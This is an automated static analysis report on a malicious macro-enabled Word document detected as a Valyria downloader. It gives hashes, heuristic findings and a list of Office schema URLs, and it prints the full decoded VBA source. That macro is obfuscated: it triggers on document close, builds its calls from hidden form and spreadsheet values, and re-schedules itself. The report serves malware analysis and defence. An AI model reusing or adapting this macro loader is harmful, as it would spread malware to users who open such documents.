Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 39605e9f51e6ec5f…

MALICIOUS

Office (OOXML)

82.4 KB Created: 2021-01-29 08:30:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-19
MD5: dd5acab95bb325e665700fdf590c7b67 SHA-1: 2c6267e978708be982347136dc7e98d9925564b3 SHA-256: 39605e9f51e6ec5fb4914b117adc23f2103a10f5949451db08702d52d75c5ad1
222 Risk Score

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-10033915-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set n4 = CreateObject(UserForm1.qk & UserForm1.bz)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Set E = CallByName(n4.Workbooks, UserForm1.ez & UserForm1.pb, 1, UserForm2.ComboBox1, , , , UserForm1.ak)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7003 bytes
SHA-256: 66e2c4223cd521f450169b46d43708c5d07cd4378c4f66327fb980d95082d9f1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public no, kf, ce, c9, si, n4, m9, qv, p6, hix, k9, mv, nzz, ke, n3, bb

Sub Document_Close()

h6

End Sub

Sub h6()

On Error Resume Next

UserForm2.ComboBox1.ListIndex = 5

kt = UserForm2.ComboBox13

Set n4 = CreateObject(UserForm1.qk & UserForm1.bz)

n4.DisplayAlerts = False

ljw = 1301

cn = 0

Err.Number = 0

While ljw <> 0 And cn < 32

Set E = CallByName(n4.Workbooks, UserForm1.ez & UserForm1.pb, 1, UserForm2.ComboBox1, , , , UserForm1.ak)

ljw = Err.Number

cn = cn + 16

Wend

If ljw <> 0 Then

ErrHandler:

na8 = CallByName(Application, UserForm1.eb & UserForm1.qf, 2)

If na8 <> False Then

or4 = UserForm2.ComboBox6

Set kr = CreateObject(UserForm1.ik & UserForm1.f3)

CallByName kr.Documents, UserForm1.ez & UserForm1.pb, 1, ActiveDocument.FullName, , True

CallByName kr, UserForm1.h9 & UserForm1.rlq, 1, Now + TimeSerial(0, 0, 2), UserForm1.i4 & UserForm1.l1 & "h6"

Else

jh = UserForm2.ComboBox8

CallByName Application, UserForm1.h9 & UserForm1.rlq, 1, Now + TimeSerial(0, 0, 17), UserForm1.i4 & UserForm1.l1 & "h6"

End If

n4.Quit

Exit Sub

End If

Dim c7

Set c7 = n4.sheets(1)

god = UserForm2.ComboBox15

vv = "'"

bb = n4.sheets(5).Cells(1, 1)

If Len(bb) < 1 Then

If n4.ActiveWorkbook.Title <> "Google" Then

GoTo ErrHandler

Else

cd = UserForm2.ComboBox3

Exit Sub

End If

End If

t1 = n4.sheets(1).Cells(49, 27).Value

r2 = c7.Cells(99, 20).Value

hix = n4.sheets(1).Cells(93, 60).Value

k9 = n4.sheets(2).Cells(134, 44).Value

si = n4.sheets(2).Cells(113, 7).Value

q0 = n4.sheets(2).Cells(78, 9).Value

dq = n4.sheets(1).Cells(80, 30).Value

ga = UserForm2.ComboBox9

v1y = n4.sheets(3).Cells(52, 45).Value

jp = n4.sheets(2).Cells(11, 2).Value

o9 = n4.sheets(1).Cells(29, 52).Value

nzz = n4.sheets(2).Cells(126, 10).Value

m9 = c7.Cells(124, 1).Value

p6 = n4.sheets(3).Cells(24, 6).Value

p9 = n4.sheets(3).Cells(74, 12).Value

hi = n4.sheets(2).Cells(44, 36).Value

jv = UserForm2.ComboBox5

mv = c7.Cells(53, 50).Value

tc9 = n4.sheets(1).Cells(149, 47).Value

ug = n4.sheets(2).Cells(51, 53).Value

no = n4.sheets(3).Cells(131, 27).Value

di2 = n4.sheets(3).Cells(143, 51).Value

h8 = c7.Cells(116, 32).Value

j67 = UserForm2.ComboBox12

qv = n4.sheets(3).Cells(112, 29).Value

kf = n4.sheets(3).Cells(134, 8).Value

gs = n4.sheets(3).Cells(131, 46).Value

r4 = UserForm2.ComboBox21

pl = n4.sheets(2).Cells(58, 24).Value

rk3 = UserForm2.ComboBox5

n3 = ""

Set Sh1 = n4.sheets(4)

jf = 1

k5 = True

While k5

lc = Sh1.Cells(jf, 1).Value

If Len(lc) < 1 Then

k5 = False

Else

n3 = n3 & lc

End If

jf = jf + 1

Wend

d6 = CallByName(n4, o9, 2)

UserForm1.pk9.Value = dq & d6 & ug

UserForm1.bk.Value = r2

CallByName CreateObject(pl), h8, 1, UserForm1.pk9, tc9, UserForm1.bk

Set o4 = CreateObject(t1)

ig = UserForm2.ComboBox19

Set ac = CallByName(o4, q0, 2)

Set r1 = CallByName(ac, gs, 1)

Set p6 = CallByName(o4, p6, 2)

Set c9 = o4

h7 = UserForm2.ComboBox17

UserForm5.ComboBox1 = "o1"

Set no = CallByName(ke, no, 2)

qv = CallByName(no, qv, 2)

UserForm1.lx.Value = di2 & v1y

UserForm3.ComboBox1 = jp

fy = UserForm2.ComboBox13

UserForm1.lx.Value = p9

UserForm4.ComboBox1 = UserForm3.ComboBox1

UserForm3.ComboBox1 = qv

o4 = fm

E = k3

duq = UserForm2.ComboBox12

c7 = c3

ac = hm

r1 = et

p6 = ek

hix = jr

j84 = UserForm2.ComboBox9

k9 = hz

ke = dv

no = fkt

c2k = UserForm2.ComboBox27

c9 = n7

DoEvents

CallByName n4, hi, 1

e8 = UserForm2.ComboBox26

n4 = uj

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C80ED98B-F814-4187-8274-0F9E8E1BEC6D}{D573506A-15DC-4A19-BDC2-289AC28A48B6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{7F2874F9-FFFD-4B3D-9F74-0B433096FF5A}{F2E480F2-E86F-45CA-B15F-FAB9CF9EDF24}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 

vj = UserForm2.ComboBox10

 

 hv = UserForm2.Controls.Count - 1
 

bd = UserForm2.ComboBox23

 
 
 

mx = UserForm2.ComboBox18


 dy = ""
 For mu7 = 1 To hv Step 2
 dy = dy & UserForm2.Controls.Item(mu7)
 Next

hs = UserForm2.ComboBox7


 ComboBox1.AddItem "f8"

b7 = UserForm2.ComboBox5

 ComboBox1.AddItem "zg"
 ComboBox1.AddItem "ei"
 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"
 ComboBox1.AddItem dy
 ComboBox1.AddItem "gz"

ro = UserForm2.ComboBox22

 
 
 
 
 
 

p0 = UserForm2.ComboBox6

 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{26CFAB0F-445A-48D4-A1AB-73861D6FA525}{82CB858B-FD75-432E-B12A-44763EAC3EBD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.no, ActiveDocument.m9, VbMethod, 1, ActiveDocument.qv
 CallByName ActiveDocument.no, ActiveDocument.kf, VbMethod, UserForm1.lx.Value
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{615C4FC4-A62E-44E5-A2F0-2D83C21282C9}{1EF39E8A-4508-497E-96D0-6B752228C4EA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.c9, ActiveDocument.si, VbMethod, UserForm1.lx.Value, ActiveDocument.n3, ActiveDocument.bb
End Sub

 

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{5CE4AFA8-8333-47D0-A4EA-7D133B805A8C}{BE2A8477-15A3-4171-984C-64AF0E672AA4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.hix = CallByName(ActiveDocument.p6, ActiveDocument.hix, VbGet)
 Set ActiveDocument.k9 = CallByName(ActiveDocument.hix, ActiveDocument.k9, VbGet)
 Set ActiveDocument.ke = CallByName(ActiveDocument.k9, ActiveDocument.mv, VbMethod, ActiveDocument.nzz)
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 51200 bytes
SHA-256: 7c26191f361eb97cb16447f11420a8dd572d3c8abe3c687b60e3a40f3cbf8750
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely